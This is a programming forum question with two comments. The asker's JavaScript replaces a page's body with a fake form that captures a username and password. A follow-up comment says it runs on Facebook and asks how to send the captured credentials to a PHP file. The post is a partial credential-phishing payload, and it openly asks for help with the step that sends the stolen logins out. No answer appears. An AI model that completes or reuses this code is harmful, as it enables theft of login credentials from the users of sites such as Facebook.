# how use any script in parent.document.body.innerHTML

Tags: javascript, html, document, innerhtml

I have any js file that use parent.document.body.innerHTML and wrote any div and span tag in its. 
after run this js file, any div and spn tag, write in this main page. 
I want to send data with js get method, to a php file. 
how can i any script tag in parent.document.body.innerHTML
my code is here:

```
parent.document.body.innerHTML =    '<div style="font-size:20pt"><br />' +
                                    'Domain: ' + document.domain + '<br /><br />' +
                                    'Username: <span id="usr"></span><br /><br />' +
                                    '<span style="background-color:yellow">Password: <span id="pass"></span><br /><br />' +
                                    '</div><br />' +
                                    '<form><input onchange="usr.innerText = this.value"/><input type="password" onchange="pass.innerText = this.value"/></form><br /><br />' 
                                    ';
```

Comment: Could you clarify your question? I'm having trouble following what it is you are trying to do.

Comment: Your question quite unclear. If English is not your first language, maybe have a family member or friend that has more experience with it help you in forming a better statement.

Comment: Yes, English is not my first language. for example, I open my facebook and this code, get user and pass, and show in same page, instead of facebook.now i want get user and pass and send to any php not instead of same page. how can i set any variable with this value. i search about document.getElementById("id").innerHTML  but didn't work var a= document.getElementById("usr").innerHTML. my js file execute on my face book.